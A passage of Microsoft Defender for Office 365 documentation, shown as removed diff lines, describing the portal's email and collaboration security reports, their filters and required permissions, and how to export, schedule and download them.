-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### View data by Email \> Malware and Chart breakdown by Detection Technology
--
-> [!NOTE]
-> In May 2021, malware detections in email were updated to include **harmful URLs** in messages attachments. This change might shift some of the detection volume out of the **View data by Email \> Phish** view and into the **View data by Email \> Malware** view. In other words, harmful URLs in message attachments that were traditionally identified as phishing now might be identified as malware instead.
-
-In the **View data by Email \> Malware** and **Chart breakdown by Detection Technology** view, the following information is shown in the chart:
--- **File detonation**<sup>\*</sup>: [Safe Attachments](safe-attachments-about.md) detected a malicious attachment during detonation analysis.-- **File detonation reputation**<sup>\*</sup>: File attachments previously detected by [Safe Attachments](safe-attachments-about.md) detonations in other Microsoft 365 organizations.-- **File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.-- **Anti-malware engine**<sup>\*</sup>: Detection from anti-malware engines.-- **URL malicious reputation**-- **URL detonation**<sup>\*</sup>: [Safe Links](safe-links-about.md) detected a malicious URL in the message during detonation analysis.-- **URL detonation reputation**<sup>\*</sup>: URLs previously detected by [Safe Links](safe-links-about.md) detonations in other Microsoft 365 organizations.-- **Campaign**<sup>\*</sup>: Messages identified as part of a [campaign](campaigns.md).-
-<sup>\*</sup> Defender for Office 365 only
-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **Detection technology**: The same detection technology values from the chart.-- **Delivery Status**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
- To see all columns, you likely need to do one or more of the following steps:
-
- - Horizontally scroll in your web browser.
- - Narrow the width of appropriate columns.
- - Zoom out in your web browser.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Detection**: The same values as in the chart.-- **Priority account protection**: **Yes** and **No**. For more information, see [Configure and review Priority accounts in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).-- **Evaluation**: **Yes** or **No**.-- **Protected by**: **MDO** (Defender for Office 365) and **EOP**-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select an entry from the details table by clicking anywhere in the row other than the check box next to the first column, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains summarized information that's also available on the [Email entity page in Defender for Office 365](mdo-email-entity-page.md) for the message. For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-In Defender for Microsoft 365, the following actions are available at the top of the Email summary panel for the Threat protection status report:
--- :::image type="icon" source="../../medi).-- :::image type="icon" source="../../medi#remediate-using-take-action).-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### Chart breakdown by Policy type
--
-In the **View data by Email \> Phish**, **View data by Email \> Spam**, or **View data by Email \> Malware** views, selecting **Chart breakdown by Policy type** shows the following information in the chart:
--- **Anti-malware**-- **Safe Attachments**<sup>\*</sup>-- **Anti-phish**-- **Anti-spam**-- **Mail flow rule** (also known as a transport rule)-- **Others**-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **Detection technology**: The same detection technology values from the chart.-- **Delivery status**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
- To see all columns, you likely need to do one or more of the following steps:
-
- - Horizontally scroll in your web browser.
- - Narrow the width of appropriate columns.
- - Zoom out in your web browser.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Detection**: Detection technology values as previously described in this article and at [Detection technologies](/office/office-365-management-api/office-365-management-activity-api-schema#detection-technologies).-- **Priority account protection**: **Yes** and **No**. For more information, see [Configure and review Priority accounts in Microsoft Defender for Office 365](priority-accounts-turn-on-priority-account-protection.md).-- **Evaluation**: **Yes** or **No**.-- **Protected by**: **MDO** (Defender for Office 365) and **EOP**-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-<sup>\*</sup> Defender for Office 365 only
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select an entry from the details table by clicking anywhere in the row other than the check box next to the first column, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains summarized information that's also available on the [Email entity page in Defender for Office 365](mdo-email-entity-page.md) for the message. For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-In Defender for Microsoft 365, the following actions are available at the top of the Email summary panel for the Threat protection status report:
--- :::image type="icon" source="../../medi).-- :::image type="icon" source="../../medi#remediate-using-take-action).-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### Chart breakdown by Delivery status
--
-In the **View data by Email \> Phish**, **View data by Email \> Spam**, or **View data by Email \> Malware** views, selecting **Chart breakdown by Delivery status** shows the following information in the chart:
--- **Hosted mailbox: Inbox**-- **Hosted mailbox: Junk**-- **Hosted mailbox: Custom folder**-- **Hosted mailbox: Deleted Items**-- **Forwarded**-- **On-premises server: Delivered**-- **Quarantine**-- **Delivery failed**-- **Dropped**-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **Detection technology**: The same detection technology values from the chart.-- **Delivery status**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
- To see all columns, you likely need to do one or more of the following steps:
-
- - Horizontally scroll in your web browser.
- - Narrow the width of appropriate columns.
- - Zoom out in your web browser.
-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Detection**: Detection technology values as previously described in this article and at [Detection technologies](/office/office-365-management-api/office-365-management-activity-api-schema#detection-technologies).-- **Protected by**: **MDO** (Defender for Office 365) and **EOP**-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-<sup>\*</sup> Defender for Office 365 only
-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-If you select an entry from the details table by clicking anywhere in the row other than the check box next to the first column, an email details flyout opens. This details flyout is known as the _Email summary panel_ and contains summarized information that's also available on the [Email entity page in Defender for Office 365](mdo-email-entity-page.md) for the message. For details about the information in the Email summary panel, see [The Email summary panel](mdo-email-entity-page.md#the-email-summary-panel).
-
-In Defender for Microsoft 365, the following actions are available at the top of the Email summary panel for the Threat protection status report:
--- :::image type="icon" source="../../medi).-- :::image type="icon" source="../../medi#remediate-using-take-action).-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**, :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**, and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
-
-### View data by Content \> Malware
--
-In the **View data by Content \> Malware** view, the following information is shown in the chart for Microsoft Defender for Office 365 organizations:
--- **Anti-malware engine**: Malicious files detected in SharePoint, OneDrive, and Microsoft Teams by the [built-in virus detection in Microsoft 365](anti-malware-protection-for-spo-odfb-teams-about.md).-- **MDO detonation**: Malicious files detected by [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).-- **File reputation**: The message contains a file that was previously identified as malicious in other Microsoft 365 organizations.-
-In the details table below the chart, the following information is available:
--- **Date**-- **Attachment filename**-- **Workload**-- **Detection technology**: The same detection technology values from the chart.-- **File size**-- **Last modifying user**-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**.-- **Detection**: The same values as in the chart.-- **Workload**: **Teams**, **SharePoint**, and **OneDrive**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** action is available.
-
-### View data by System override and Chart breakdown by Reason
--
-In the **View data by System override** and **Chart breakdown by Reason** view, the following override reason information is shown in the chart:
--- **Data Loss Prevention**: Email messages that were quarantined by [data loss prevention (DLP) policies](/purview/dlp-learn-about-dlp).-- **Exchange transport rule**-- **Exclusive setting (Outlook)**-- **IP Allow**-- **On-premises skip**-- **Organization allowed domains**-- **Organization allowed senders**-- **Phishing simulation**: For more information, see [Configure the delivery of third-party phishing simulations to users and unfiltered messages to SecOps mailboxes](advanced-delivery-policy-configure.md).-- **Sender Domain List**-- **TABL - Both URL and file allowed**-- **TABL - File allowed**-- **TABL - File blocked**-- **TABL - URL allowed**-- **TABL - URL blocked**-- **TABL Sender email address Allow**-- **TABL Sender email address block**-- **TABL Spoof Block**-- **Third party filter**-- **Trusted Contact List - Sender in Address Book**-- **Trusted Recipient Address List**-- **Trusted Recipient Domain List**-- **Trusted Senders List (Outlook)**-- **User Safe Domain**-- **User Safe Sender**-- **ZAP not enabled**-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **System override**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Reason**: The same values as the chart.-- **Delivery Location**: **Junk Mail folder not enabled** and **SecOps mailbox**.-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** action is available.
-
-### View data by System override and Chart breakdown by Delivery location
--
-In the **View data by System override** and **Chart breakdown by Delivery location** view, the following override reason information is shown in the chart:
--- **Junk Mail folder not enabled**-- **SecOps mailbox**: For more information, see [Configure the delivery of third-party phishing simulations to users and unfiltered messages to SecOps mailboxes](advanced-delivery-policy-configure.md).-
-In the details table below the chart, the following information is available:
--- **Date**-- **Subject**-- **Sender**-- **Recipients**-- **System override**-- **Sender IP**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Reason**: The same values as in [Chart breakdown by Policy type](#chart-breakdown-by-policy-type)-- **Delivery Location**: **Junk Mail folder not enabled** and **SecOps mailbox**.-- **Direction**: Leave the value **All** or remove it, double-click in the empty box, and then select **Inbound**, **Outbound**, or **Intra-org**.-- **Tag**: Leave the value **All** or remove it, double-click in the empty box, and then select **Priority account**. For more information about user tags, see [User tags](user-tags-about.md).-- **Domain**: Leave the value **All** or remove it, double-click in the empty box, and then select an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).-- **Policy type**: Select **All** or one of the following values:
- - **Anti-malware**
- - **Safe Attachments**
- - **Anti-phish**
- - **Anti-spam**
- - **Mail flow rule** (transport rule)
- - **Others**
-- **Policy name (details table view only)**: Select **All** or a specific policy.-- **Recipients (separated by commas)**-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Threat protection status** page, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** action is available.
-
-## Top malware report
-
-The **Top malware** report shows the various kinds of malware that was detected by [anti-malware protection in EOP](anti-malware-protection-about.md).
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Top malware**.
-
-Hover over a wedge in the pie chart to see the malware name and how many messages contained the malware.
--
-Select **View details** to go to the **Top malware report** page. Or, to go directly to the report, use <https://security.microsoft.com/reports/TopMalware>.
-
-On the **Top malware report** page, a larger version of the pie chart is displayed. The details table below the chart shows the following information:
--- **Top malware**: The malware name-- **Count**: How many messages contained the malware.-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting the **Start date** and **End date** values in the flyout that opens.
-
-On the **Top malware** page, the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)** and :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** actions are available.
--
-## Top senders and recipients report
-
-The **Top senders and recipients** report is available in both EOP and Defender for Office 365; however, the reports contain different data. For example, EOP customers can view information about top malware, spam, and phishing (spoofing) recipients, but not information about malware detected by [Safe Attachments](safe-attachments-about.md) or phishing detected by [impersonation protection](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
-The **Top senders and recipients** report shows the top 20 message senders in the organization, as well as the top 20 recipients for messages that were detected by EOP and Defender for Office 365 protection features. By default, the report shows data for the last week, but data is available for the last 90 days.
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **Top senders and recipients**.
-
-Hover over a wedge in the pie chart to see the number of messages for the sender or recipient.
--
-Select **View details** to go to the **Top senders and recipients** page. Or, to go directly to the report, use one of the following URLs:
--- **Defender for Office 365**: <https://security.microsoft.com/reports/TopSenderRecipientsATP>-- **EOP**: <https://security.microsoft.com/reports/TopSenderRecipient>-
-On the **Top senders and recipients** page, a larger version of the pie chart is displayed. The following charts are available:
--- **Show data for Top mail senders** (default view)-- **Show data for Top mail recipients**-- **Show data for Top spam recipients**-- **Show data for Top malware recipients** (EOP)-- **Show data for Top phishing recipients**-- **Show data for Top malware recipients (MDO)**-- **Show data for Top phish recipients (MDO)**-- **Show data for Top intra.org mail senders**-- **Show data for Top intra.org mail recipients**-- **Show data for Top intra.org spam recipients**-- **Show data for Top intra.org malware recipients**-- **Show data for Top intra.org phishing recipients**-- **Show data for Top intra.org phishing recipients (MDO)**-- **Show data for Top intra.org malware recipients (MDO)**-
-Hover over a wedge in the pie chart to see the message count for that specific sender or recipient.
-
-For each chart, the details table below the chart shows the following information:
--- **Email address**-- **Item count**-- **Tags**: For more information about user tags, see [User tags](user-tags-about.md).-
-Select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter** to modify the report by selecting one or more of the following values in the flyout that opens:
--- **Date (UTC)** **Start date** and **End date**-- **Tag**: Select **All** or the specified user tag (including Priority account). For more information, see [User tags](user-tags-about.md).-
-When you're finished configuring the filters, select **Apply**, **Cancel**, or :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-On the **Top senders and recipients** page, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** action is available.
--
-## URL protection report
-
-The **URL protection report** is available only in Microsoft Defender for Office 365. For more information, see [URL protection report](reports-defender-for-office-365.md#url-protection-report).
-
-## User reported messages report
-
-> [!IMPORTANT]
-> In order for the **User reported messages** report to work correctly, **audit logging must be turned on** in your Microsoft 365 organization (it's on by default). For more information, see [Turn auditing on or off](/purview/audit-log-enable-disable).
-
-The **User reported messages** report shows information about email messages that users have reported as junk, phishing attempts, or good mail by using the [built-in Report button in Outlook on the web](submissions-outlook-report-messages.md#use-the-built-in-report-button-in-outlook-on-the-web) or the [Microsoft Report Message or Report Phishing add-ins](submissions-outlook-report-messages.md#use-the-report-message-and-report-phishing-add-ins-in-outlook).
-
-On the **Email & collaboration reports** page at <https://security.microsoft.com/emailandcollabreport>, find **User reported messages**, and then select **View details**. Or, to go directly to the report, use <https://security.microsoft.com/reports/userSubmissionReport>.
-
-To go directly to the **User reported** tab on the **Submissions** page in the Defender portal, select **Go to submissions**.
--
-The chart shows the following information:
--- **Not junk**-- **Phish**-- **Spam**-
-The details table below the graph shows the same information and has the same actions that are available on the **User reported** tab on the **Submissions** page at <https://security.microsoft.com/reportsubmission?viewid=user>:
--- :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns**-- :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group**-- :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**-- :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify**-- :::image type="icon" source="../../media/m365-cc-sc-submit-user-reported-message-icon.png" border="false"::: **Submit to Microsoft for analysis**-
-For more information, see [View user reported messages to Microsoft](submissions-admin.md#view-user-reported-messages-to-microsoft) and [Admin actions for user reported messages](submissions-admin.md#admin-actions-for-user-reported-messages).
--
-On the report page, the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)** action is available.
--
-## What permissions are needed to view these reports?
-
-You need to be assigned permissions before you can view and use the reports that are described in this article. You have the following options:
--- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Security data basics (read)** or **Authorization and settings/System settings/manage**.-- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in any of the following role groups:
- - **Organization Management**<sup>\*</sup>
- - **Security Administrator**
- - **Security Reader**
- - **Global Reader**
-- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**<sup>\*</sup>, **Security Administrator**, **Security Reader**, or **Global Reader** roles in Microsoft Entra ID gives users the required permissions _and_ permissions for other features in Microsoft 365.-
-<sup>\*</sup> Membership in the **Organization Management** role group or in the **Global Administrator** role is required to use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)** or :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)** actions in reports (where available).
-
-## What if the reports aren't showing data?
-
-If you don't see data in the reports, check the report filters and double-check that your protection policies are configured to detect and take action on messages. For more information, see the following articles:
--- [Configuration analyzer for protection policies in EOP and Microsoft Defender for Office 365](configuration-analyzer-for-security-policies.md)-- [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md)-- [How do I turn off spam filtering?](anti-spam-protection-faq.yml#how-do-i-turn-off-spam-filtering-)-
-## Download and export report information
-
-Depending on the report and the specific view in the report, one or more of the following actions might be available on the main report page as previously described:
--- :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Export](#export-report-data)**-- :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **[Create schedule](#schedule-recurring-reports)**-- :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **[Request report](#request-on-demand-reports-for-download)**-
-### Export report data
-
-> [!TIP]
->
-> - The exported data is affected by any filters that are configured in the report at the time of export.
-> - If the exported data exceeds 150000 entries, the data is split into multiple files.
-
-1. On the report page, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export**.
-
-2. In the **Export conditions** flyout that opens, review and configure the following settings:
-
- - **Select a view to export**: Select one of the following values:
- - **Summary**: Data from the last 90 days is available. This is the default value.
- - **Details**: Data from the last 30 days is available. A date range of one day is supported.
- - **Date (UTC)**:
- - **Start date**: The default value is three months ago.
- - **End date**: The default value is today.
-
- When you're finished in the **Export conditions** flyout, select **Export**.
-
- The **Export** button changes to **Exporting...** and a progress bar is shown.
-
-3. In the **Save as** dialog that opens, you see the default name of the .csv file and the download location (the local Downloads folder by default), but you can change those values and then select **Save** to download the exported data.
-
- If you see a dialog that security.microsoft.com wants to download multiple files, select **Allow**.
-
-### Schedule recurring reports
-
-> [!NOTE]
-> To create scheduled reports, you need to be a member of the **Organization management** role in Exchange Online or the **Global Administrator** role in Microsoft Entra ID.
-
-1. On the report page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png"::: **Create schedule** to start the new scheduled report wizard.
-
-2. On the **Name scheduled report** page, review or customize the **Name** value, and then select **Next**.
-
-3. On the **Set preferences** page, review or configure the following settings:
- - **Frequency**: Select one of the following values:
- - **Weekly** (default)
- - **Daily** (this value results in no data being shown in charts)
- - **Monthly**
- - **Start date**: Enter the date when generation of the report begins. The default value is today.
- - **Expiry date**: Enter the date when generation of the report ends. The default value is one year from today.
-
- When you're finished on the **Set preferences** page, select **Next**.
-
-4. On the **Select filters** page, configure the following settings:
- - **Direction**: Select one of the following values:
- - **All** (default)
- - **Outbound**
- - **Inbound**
- - **Sender address**
- - **Recipient address**
-
- When you're finished on the **Select filters** page, select **Next**.
-
-5. On the **Recipients** page, choose recipients for the report in the **Send email to** box. The default value is your email address, but you can add others by doing either of the following steps:
- - Click in the box, wait for the list of users to resolve, and then select the user from the list below the box.
- - Click in the box, start typing a value, and then select the user from the list below the box.
-
- To remove an entry from the list, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Recipients** page, select **Next**.
-
-6. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review page**, select **Submit**.
-
-7. On the **New scheduled report created** page, you can select the links to view the scheduled report or create another report.
-
- When you're finished on the **New scheduled report created** page, select **Done**.
-
-The reports are emailed to the specified recipients based on the schedule you configured
-
-The scheduled report entry is available on the **Managed schedules** page as described in the next subsection.
-
-#### Manage existing scheduled reports
-
-After you create a scheduled report as described in the previous section, the scheduled report entry is available on the **Manage schedules** page in the Defender portal.
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Reports** \> **Email & collaboration** \> select **Manage schedules**. Or, to go directly to the **Manage schedules** page, use <https://security.microsoft.com/ManageSubscription>.
-
-On the **Manage schedules** page, the following information is shown for each scheduled report entry:
--- **Schedule start date**-- **Schedule name**-- **Report type**-- **Frequency**-- **Last sent**-
-To change the list from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find an existing scheduled report entry.
-
-To modify the scheduled report settings, do the following steps:
-
-1. Select the scheduled report entry by clicking anywhere in the row other than the check box.
-
-2. In the details flyout that opens, do any of the following steps:
- - Select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit name** to change the name of the scheduled report.
- - Select the **Edit** link in the section to modify the corresponding settings.
-
- The settings and configuration steps are the same as described in [Schedule report](#schedule-recurring-reports).
-
-To delete a scheduled report entry, use either of the following methods:
--- Select the check box next to one, more or all of the scheduled reports, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears on the main page.-- Select the scheduled report by clicking anywhere in the row other than the check box, and then select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** in the details flyout that opens.-
-Read the warning dialog that opens, and then select **OK**.
-
-Back on the **Manage schedules** page, the deleted scheduled report entry is no longer listed, and previous reports for the scheduled report are deleted and are no longer available for download.
-
-### Request on-demand reports for download
-
-[Request on-demand reports](#request-on-demand-reports-for-download)
-
-> [!NOTE]
-> To create on-demand reports, you need to be a member of the **Organization management** role in Exchange Online or the **Global Administrator** role in Microsoft Entra ID.
-
-1. On the report page, select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Request report** to start the new on-demand report wizard.
-
-2. On the **Name on-demand report** page, review or customize the **Name** value, and then select **Next**.
-
-3. On the **Set preferences** page, review or configure the following settings:
- - **Start date**: Enter the start date for the report data. The default value is one month ago.
- - **Expiry date**: Enter the end date for the report data. The default value is today.
-
- When you're finished on the **Name on-demand report** page, select **Next**.
-
-4. On the **Recipients** page, choose recipients for the report in the **Send email to** box. The default value is your email address, but you can add others by doing either of the following steps:
- - Click in the box, wait for the list of users to resolve, and then select the user from the list below the box.
- - Click in the box, start typing a value, and then select the user from the list below the box.
-
- To remove an entry from the list, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Recipients** page, select **Next**.
-
-5. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review page**, select **Submit**.
-
-6. On the **New on-demand report created** page, you can select the link to create another report.
-
- When you're finished on the **New on-demand report created** page, select **Done**.
-
-The report creation task (and eventually the finished report) is available on the **Reports for download** page as described in the next subsection.
-
-#### Download reports
-
-> [!NOTE]
-> To download on-demand reports, you need to be a member of the **Organization management** role in Exchange Online or the **Global Administrator** role in Microsoft Entra ID.
-
-After you request an on-demand report as described in the previous section, you check the status of the report and eventually download the report on the **Reports for download** page in the Defender portal.
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Reports** \> **Email & collaboration** \> select **Reports for download**. Or, to go directly to the **Reports for download** page, use <https://security.microsoft.com/ReportsForDownload>.
-
-On the **Reports for download** page, the following information is shown for each available report:
--- **Start date**-- **Name**-- **Report type**-- **Last sent**-- **Status**:
- - **Pending**: The report is still being created, and it isn't available to download yet.
- - **Complete - Ready for download**: Report generation is complete, and the report is available to download.
- - **Complete - No results found**: Report generation is complete, but the report contains no data, so you can't download it.
-
-To download the report, select the check box next in the start date of the report, and then select the :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download report** action that appears.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find an existing report.
-
-In the **Save as** dialog that opens, you see the default name of the .csv file and the download location (the local Downloads folder by default), but you can change those values and then select **Save** to download the report.
-
-## Related articles
-
-[Anti-spam protection in EOP](anti-spam-protection-about.md)
-
